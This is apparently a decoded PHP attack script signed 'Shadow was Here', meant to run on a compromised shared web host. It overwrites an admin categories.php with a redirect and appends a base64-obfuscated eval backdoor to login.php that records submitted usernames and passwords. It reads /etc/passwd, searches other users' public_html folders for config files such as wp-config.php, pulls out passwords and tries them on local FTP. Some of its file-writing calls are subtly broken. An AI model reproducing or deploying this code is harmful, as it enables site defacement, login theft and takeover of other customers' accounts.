/* Decoded by unphp.net */

echo "<html>";
echo "<title>Shadow was Here</title><body>";
set_time_limit(0);
$system_uname = php_uname();
$system_pwd   = getcwd();
#####################
$pwd_admin = ereg_replace('/images','/admin', $system_pwd);
if (chdir($pwd_admin)) {
	if (is_writable($pwd_admin)) {
		if (is_writable('categories.php')) {
			unlink('categories.php');
			$new_categories     = "<?php header(location:'http://www.google.com'); ?>";
			$patch_categories   = fopen('categories.php','w');
			$write_categories   = fwrite('categories.php',"$new_categories");
			$response_categories= "[-] Categories Patched";
		}
		else { $response_categories = "[-] Unable to patch Categories"; }
		if (is_writable('login.php')) {
			$backdoor_login = "<?php eval(base64_decode('aWYgKCRIVFRQX1BPU1RfVkFSU1sndXNlcm5hbWUnXSkgew0KCQ0KCSR3cml0ZSA9ICgkSFRUUF9QT1NUX1ZBUlNbJ3VzZXJuYW1lJ10pOw0KCXBhc3Nfd3JpdGUoJHdyaXRlKTsNCn0NCmlmICgkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ10pIHsNCgkkd3JpdGUgPSAkSFRUUF9QT1NUX1ZBUlNbJ3Bhc3N3b3JkJ107DQoJcGFzc193cml0ZSgkd3JpdGUpOw0KfQ0KZnVuY3Rpb24gcGFzc193cml0ZSgkd3JpdGUpIHsNCglpZiAoaXNfd3JpdGFibGUoJy90bXAnKSkgew0KCQkkcGFzc19maWxlID0gZm9wZW4oJ3Bhc3N3ZC50eHQnLCJhKyIpOw0KCQkkcGFzc193cml0ZT0gZndyaXRlKCRwYXNzX2ZpbGUsICIkd3JpdGUiKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCcvdmFyL3RtcCcpKSB7DQoJCSRwYXNzX2ZpbGUgPSBmb3BlbigncGFzc3dkLnR4dCcsImErIik7DQoJCSRwYXNzX3dyaXRlPSBmd3JpdGUoJHBhc3NfZmlsZSwgJHdyaXRlKTsNCgl9DQoJZWxzZWlmKGlzX3dyaXRhYmxlKCdkZXYvc2htJykpIHsNCgkJJHBhc3NfZmlsZSA9IGZvcGVuKCcvZGV2L3NobS9wYXNzd2QudHh0JywiYSsiKTsNCgkJJHBhc3Nfd3JpdGU9IGZ3cml0ZSgnJHBhc3NfZmlsZScsICIkd3JpdGUiKTsNCgl9DQp9'); ?>";
			$add_on_login   = fopen('login.php','a+');
			$write_login    = fwrite('login.php',$backdoor_login);
			$response_login = "[-] Put backdoor on Login";
					}
		else { $response_login = "[-] Unable To put backdoor on Login"; }			
	}
}
#####################################

###Bjork## 
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
   echo "[-] Error : Unable to open /etc/passwd";
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
  $str=fgets($passwd);
  if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
        if (is_readable($dirz)) {
            array_push($users,$username);
            array_push($path_to_public,$dirz);
        }
    }
  }
  $i++;
}
###################
#########################
echo "<br><br>";
echo "<textarea name='main_window' cols=100 rows=20>";
echo "[+] Founded ".sizeof($users)." entries in /etc/passwd
";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
";
echo "[~] Searching for passwords in config.* files...

";
echo "$response_work_dir
";
echo "$response_login
";
echo "$response_categories
";
echo "$response_bot
";
foreach ($users as $user) {
        $path="/home/$user/public_html/";
        read_dir($path,$user);
}
echo "
[+] Done
";
function read_dir($path,$username) {
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
              $fpath="$path$file";
              if (($file!='.') and ($file!='..')) {
                 if (is_readable($fpath)) {
                    $dr="$fpath/";
                    if (is_dir($dr)) {
                       read_dir($dr,$username);
                    }
                    else {
                         if (($file=='config.php') or ($file=='e107_config.php') or ($file=='header.inc.php') or ($file=='content.inc.php') or ($file=='mainfile.php') or ($file=='utils.inc.php') or ($file=='main.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='e107_config.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='configuration.php') or ($file=='configurations.php') or ($file=='configs.php') or ($file=='config.locale.php') or ($file=='db.inc.php') or ($file=='dbconnect.inc.php') or ($file=='dbconnection.php') or ($file=='var.php') or ($file=='mysql.php') or ($file=='global.inc.php') or ($file=='database.php') or ($file=='dbconnect.php') or ($file=='conf.php') or ($file=='configDB.inc.php') or ($file=='db.php') or ($file=='db_connect.php')) {
                            $pass=get_pass($fpath);
                            if ($pass!='') {
                               echo "[+] $fpath
$pass
";
                               ftp_check($username,$pass);
                            }
                         }
                    }
                }
             } 
        }
    }
}
function get_pass($link) {
    @$config=fopen($link,'r');
    while(!feof($config)) {
        $line=fgets($config);
        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
            if (strrpos($line,'"'))
                           $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
         else
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
            return $pass;
        }
    }
}
function ftp_check($login,$pass) {
     @$ftp=ftp_connect('127.0.0.1');
     if ($ftp) {
        @$res=ftp_login($ftp,$login,$pass);
        if ($res) {
          echo '[FTP] '.$login.':'.$pass."  Success
";
        }
        else ftp_quit($ftp);
     }
}
echo "</textarea><br>";
echo "</body></html>";